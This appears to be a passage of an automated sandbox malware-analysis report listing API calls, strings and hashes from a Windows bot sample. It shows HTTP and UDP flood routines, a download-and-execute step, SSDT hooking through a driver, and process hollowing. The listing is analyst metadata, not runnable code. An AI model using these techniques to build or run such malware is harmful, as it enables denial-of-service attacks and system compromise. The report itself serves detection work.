      • printf.MSVCRT ref: 0040192F
      • printf.MSVCRT ref: 00401A10
      Strings
      • Possibly KiServiceLimit==%08X, xrefs: 004019EE
      • 0x%x 0x%08X, xrefs: 004019CB
      • ntdll.dll, xrefs: 00401870
      • &KiServiceTable==%08XDumping 'old' ServiceTable:, xrefs: 00401972
      • Can't find KeServiceDescriptorTable, xrefs: 0040192A
      • NtQuerySystemInformation, xrefs: 0040186B
      • KeServiceDescriptorTable, xrefs: 0040191A
      • Failed to load! LastError=%i, xrefs: 004018F9
      • strange NtQuerySystemInformation()!, xrefs: 00401A0B
      • Can't find KiServiceTable..., xrefs: 00401952
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Similarity
      • API ID: printf$AddressGlobalProc$AllocErrorFreeHandleLastLibraryLoadModule
      • String ID: Possibly KiServiceLimit==%08X$&KiServiceTable==%08XDumping 'old' ServiceTable:$0x%x 0x%08X$Can't find KeServiceDescriptorTable$Can't find KiServiceTable...$Failed to load! LastError=%i$KeServiceDescriptorTable$NtQuerySystemInformation$ntdll.dll$strange NtQuerySystemInformation()!
      • API String ID: 3553604609-3775360644

      Control-flow Graph

      Strings
      • http://, xrefs: 004040B9, 004040E2
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 0040426A
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstrwsprintf$closesocketconnecthtonssendsocketstrncpy
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1549958995-1933603558
      APIs
      • strstr.MSVCRT ref: 00403E69
      • strstr.MSVCRT ref: 00403E8E
      • strcspn.MSVCRT ref: 00403EB0
      • strncpy.MSVCRT ref: 00403EB9
      • strcspn.MSVCRT ref: 00403EC5
      • htons.WS2_32 ref: 00403F52
      • wsprintfA.USER32 ref: 00403FAD
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403FE0
      • connect.WS2_32(00000000,?,00000010), ref: 00403FF0
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0040400D
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,00000001,00000004), ref: 00404021
      • send.WS2_32(00000000,?,?,00000000), ref: 00404045
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040404D
      • closesocket.WS2_32(00000000), ref: 00404053
      • Sleep.KERNEL32(?,?,00000000), ref: 00404060
      Strings
      • http://, xrefs: 00403E49, 00403E72
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 00403FA7
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstr$closesocketconnecthtonssendsocketstrncpywsprintf
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1044657935-1933603558
      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00401525
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040152E
      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 0040153E
      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 0040154A
      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00401586
      • strncpy.MSVCRT ref: 004015C9
      • CreateProcessA.KERNEL32 ref: 00401616
      • FreeLibrary.KERNEL32(00000000), ref: 00401623
      • FreeLibrary.KERNEL32(00000000), ref: 00401626
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: Library$AddressFreeLoadProc$??2@CreateProcessstrncpy
      • String ID: D$GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$c:\2.exe$urlmon.dll$wininet.dll
      • API String ID: 2866020857-3875728843
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004044AA
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 004044CA
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 004044D6
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004044E0
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004044EC
      • Sleep.KERNEL32(?), ref: 004045AC
      • FreeLibrary.KERNEL32(00000000), ref: 004045C1
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: AddressProc$Library$FreeLoadSleep
      • String ID: Cache-Control: no-cacheReferer: http://www.google.com$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$wininet.dll$xq1986
      • API String ID: 4229481857-500719541
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040144C
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0040146B
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00401475
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0040147F
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0040148B
      • FreeLibrary.KERNEL32(00000000), ref: 004014EE
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: AddressProc$Library$FreeLoad
      • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$JiangMin$wininet.dll
      • API String ID: 2449869053-1511921226
      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040385F
      • htons.WS2_32 ref: 0040388A
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • htons.WS2_32(00000305), ref: 004038A7
      • htons.WS2_32(00000100), ref: 004038B3
      • htons.WS2_32(00000001), ref: 004038BC
      • htons.WS2_32(00000001), ref: 004038D6
      • htons.WS2_32(00000001), ref: 004038DF
      • sendto.WS2_32(?,?,0000000C,00000000,?,00000010), ref: 004039EA
      • Sleep.KERNEL32(?), ref: 004039F7
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: htons$CountSleepTickgethostbynameinet_addrrandsendtosocketsrand
      • String ID: com$www
      • API String ID: 3135813497-1875102311
      APIs
      • htons.WS2_32 ref: 00404368
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • wsprintfA.USER32 ref: 004043B0
      • socket.WS2_32(00000002,00000001,00000006), ref: 004043E5
      • connect.WS2_32(00000000,?,00000010), ref: 004043F5
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00404412
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,?,00000004), ref: 00404426
      • send.WS2_32(00000000,?,?,00000000), ref: 00404444
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040444C
      • closesocket.WS2_32(00000000), ref: 00404452
      • Sleep.KERNEL32(?,?,00000000), ref: 0040445E
      Strings
      • GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 004043AA
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: Sleepsetsockopt$closesocketconnectgethostbynamehtonsinet_addrsendsocketwsprintf
      • String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
      • API String ID: 3772806076-3649629926
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401A3B
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00000010), ref: 00401A4F
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401A5C
      • puts.MSVCRT ref: 00401A6B
      • CreateFileA.KERNEL32(\\.\Dark2118,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00401A89
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A98
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A9B
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: Service$CloseHandleOpen$CreateFileManagerStartputs
      • String ID: PCIDump$Start beep service ok$\\.\Dark2118
      • API String ID: 1337555625-3442187310
      APIs
        • Part of subcall function 00404F50: CreateProcessA.KERNEL32 ref: 00404F95
        • Part of subcall function 00404F50: GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
        • Part of subcall function 00404F50: ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
        • Part of subcall function 00404F50: VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      • VirtualProtectEx.KERNEL32(FFFFFFFF,?,00000000,00000040,?,00000000,00000000,00000000), ref: 004050DC
      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?,?,?,00000000,00000000,00000000), ref: 0040518E
      • WriteProcessMemory.KERNEL32(?,00000000,?,?,?), ref: 004051A4
      • SetThreadContext.KERNEL32(?,00010007), ref: 004051E5
      • ResumeThread.KERNEL32(?), ref: 004051F0
      • CloseHandle.KERNEL32(?), ref: 00405201
      • CloseHandle.KERNEL32(?), ref: 00405208
      • TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00405222
      • CloseHandle.KERNEL32(?), ref: 00405233
      • CloseHandle.KERNEL32(?), ref: 0040523A
      • CloseHandle.KERNEL32(?), ref: 00405249
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: CloseHandleProcess$MemoryThread$ContextVirtualWrite$CreateProtectQueryReadResumeTerminate
      • String ID:
      • API String ID: 1172303993-0
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
      • String ID:
      • API String ID: 801014965-0
      APIs
      • htons.WS2_32 ref: 00403A5B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000000), ref: 00403A8A
      • connect.WS2_32(00000000,?,00000010), ref: 00403A9A
      • sprintf.MSVCRT ref: 00403B0F
      • send.WS2_32(00000000,?,?,00000000), ref: 00403B2F
      • Sleep.KERNEL32(?,?,00000000), ref: 00403B41
      • closesocket.WS2_32(00000000), ref: 00403B55
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • closesocket.WS2_32(00000000), ref: 00403B7B
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: closesocket$CountSleepTickconnectgethostbynamehtonsinet_addrrandsendsocketsprintfsrand
      • String ID: #%d<<<<<I@C<<<<<%s!
      • API String ID: 2412321289-2252867878
      APIs
      • CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
      • GetLastError.KERNEL32(?,00000000), ref: 0040232B
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      • WSAStartup.WS2_32(00000202,?), ref: 00402354
      • CreateThread.KERNEL32(00000000,00000000,004023A0,00000000,00000000,00000000), ref: 0040237B
      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00402382
      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402385
      • Sleep.KERNEL32(00002710,?,00000000), ref: 0040238C
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 0040231A
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3243752880-1710454822
      APIs
      • RegisterServiceCtrlHandlerA.ADVAPI32(WinH83,004020E0), ref: 00401FBE
      • SetServiceStatus.ADVAPI32(00000000,00409B00), ref: 00401FE5
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040204E
      • ExitProcess.KERNEL32 ref: 0040208D
        • Part of subcall function 00401030: GetSystemDirectoryA.KERNEL32(?,00000040), ref: 0040103F
      • GetCurrentProcess.KERNEL32(00004000,?,?,?), ref: 0040209D
      • SetPriorityClass.KERNEL32(00000000), ref: 004020A4
        • Part of subcall function 00402310: CreateMutexA.KERNEL32(00000000,00000000,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,?,00000000), ref: 00402323
        • Part of subcall function 00402310: GetLastError.KERNEL32(?,00000000), ref: 0040232B
        • Part of subcall function 00402310: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00402339
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Similarity
      • API ID: ProcessService$ClassCloseCreateCtrlCurrentDirectoryErrorExitFileHandleHandlerLastModuleMutexNamePriorityRegisterStatusSystem
      • String ID: WinH83
      • API String ID: 1658639894-961809781
      APIs
      • CloseHandle.KERNEL32(?), ref: 00401AB9
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401AC5
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00010020), ref: 00401ADE
      • ControlService.ADVAPI32(00000000,00000001,?), ref: 00401AF8
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401AFF
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401B02
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Service$CloseHandle$Open$ControlManager
      • String ID: PCIDump
      • API String ID: 221034970-2760668468
      • Opcode ID: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction ID: ad2f3aa41601f700f468a5a7830ac414b64389455abcdf9db4cbc2565e09f406
      • Opcode Fuzzy Hash: d3f51e32179601bd6bd385f92349c8e65cf1fd802eb3f5bc66244932cf849bfe
      • Instruction Fuzzy Hash: 48F0E2326813107BE122EB289D8AF6F7A38EF88B51F010024FA0672291DB74981186A9
      APIs
      • WSAStartup.WS2_32(00000202,?), ref: 00403453
      • WSASocketA.WS2_32 ref: 0040346D
      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 004034A0
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: SocketStartupsetsockopt
      • String ID:
      • API String ID: 3631403553-0
      • Opcode ID: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction ID: 226e03a2150bb59f1e7f6b3c1f6d9c6eb840beed862f8ec42d854958baf2facb
      • Opcode Fuzzy Hash: e1dcf5baf38bc8b48eae98141d4a7c83cceea2be991cffbceb56b85ab6e853a1
      • Instruction Fuzzy Hash: 6241D8716443006AE3109F64DC45B5BB7E8EF8C724F00493EFA45FB2D1E6759A04875A
      APIs
      • htons.WS2_32 ref: 00403737
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403770
      • connect.WS2_32(00000000,?,00000010), ref: 0040377C
      • setsockopt.WS2_32 ref: 0040379C
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • send.WS2_32(00000000,?,00000000,00000000), ref: 004037E1
      • Sleep.KERNEL32(?), ref: 004037FC
      • closesocket.WS2_32(00000000), ref: 0040380C
      • Sleep.KERNEL32(?), ref: 00403818
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketconnectgethostbynamehtonsinet_addrrandsendsetsockoptsocketsrand
      • String ID:
      • API String ID: 526411511-0
      • Opcode ID: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction ID: 392376a69a85ddd6a41fefe85f27db82272ddffc380eaf5d6d57f244aef9ba4d
      • Opcode Fuzzy Hash: 444a2075ad8941576596289908408714f768e301d8c063e47ccbfb94edac868b
      • Instruction Fuzzy Hash: 7D31C8B17403416BE7009B65DD46FAB77E8EB88700F00843DF645EB3D1E6B8D9148B6A
      APIs
      • htons.WS2_32 ref: 00403BC7
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403C06
      • connect.WS2_32(00000000,?,00000010), ref: 00403C16
      • closesocket.WS2_32(00000000), ref: 00403C22
      • send.WS2_32(00000000,?,00000000), ref: 00403C6A
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C77
      • closesocket.WS2_32(00000000), ref: 00403C80
      • Sleep.KERNEL32(?,?,00000000), ref: 00403C8D
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction ID: 54006a430e523e054915d6eeed30a28e789cf4b120cc542b5afca5d7f0e37e33
      • Opcode Fuzzy Hash: 6338840cde0a2a7df0f9744fb7fc18c33f45636636b2eddbddb7982ae8ac7723
      • Instruction Fuzzy Hash: C92128716043006BE3009F25ED41B6B77E8EB88710F004939F655FB2E2D679DA50CB9D
      APIs
      • htons.WS2_32 ref: 00404608
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 0040463F
      • connect.WS2_32(00000000,?,00000010), ref: 0040464F
      • send.WS2_32(00000000,00408A7C,00000000,00000000), ref: 0040466A
      • Sleep.KERNEL32(?), ref: 00404678
      • closesocket.WS2_32(00000000), ref: 00404681
      • Sleep.KERNEL32(0000001E), ref: 00404689
      • closesocket.WS2_32(00000000), ref: 004046A1
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleepclosesocket$connectgethostbynamehtonsinet_addrsendsocket
      • String ID:
      • API String ID: 1592164743-0
      • Opcode ID: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction ID: 52552667529c1c02b845fd8a5a2af135eee2e5d9a0b5595cc109e900984e1983
      • Opcode Fuzzy Hash: 5eebb4bd4fb58d615f5178da3257558304f254ebf4d24a63fe7bd5c24358b5b7
      • Instruction Fuzzy Hash: EB21C9712003005BE300DF79AD45B6B77D8EF85320F00493AF655E62E2E779D9558BAD
      APIs
      • htons.WS2_32(?), ref: 004035FB
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 00403634
      • setsockopt.WS2_32 ref: 00403652
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      • sendto.WS2_32(00000000,?,00000000,00000000,?,00000010), ref: 004036A1
      • Sleep.KERNEL32(?), ref: 004036BC
      • closesocket.WS2_32(00000000), ref: 004036CC
      • Sleep.KERNEL32(?), ref: 004036D8
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$CountTickclosesocketgethostbynamehtonsinet_addrrandsendtosetsockoptsocketsrand
      • String ID:
      • API String ID: 1041160085-0
      • Opcode ID: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction ID: 989c941252648da03f0e755ab53e95e2a6e75eaf6f0a8efd28d51292b3b26e67
      • Opcode Fuzzy Hash: 8a1cc530a81bfc68c490b0e3cc263bfa586558bb8acf8600ee6311d4aa21e5e8
      • Instruction Fuzzy Hash: E131D6717003417BE710DB65DD45BAB76D8EB88700F00883DB685EB3D1E6B989108B5E
      APIs
      • LoadLibraryA.KERNEL32(Shell32.dll), ref: 00401646
      • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 00401654
      • FreeLibrary.KERNEL32(00000000), ref: 0040166F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: Shell32.dll$ShellExecuteA$open
      • API String ID: 145871493-1242875128
      • Opcode ID: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction ID: 18a04fa1837e6b3da508e0e8e43fba5aac3cedb90d2bc1d2a056c299085bb5dc
      • Opcode Fuzzy Hash: 2e57850eee62508e1949f66f631c0d0079fe20c14937c4a69f495ebaaf87453f
      • Instruction Fuzzy Hash: F2D05E306C9310BBE1207F50AD0EFAF2A54DB46B01F120021FA02792D0D6B8280085BE
      APIs
      • CreateFileA.KERNEL32 ref: 00405297
      • GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 004052AE
      • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 004052B7
      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?), ref: 004052E2
      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00405304
      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?), ref: 0040530B
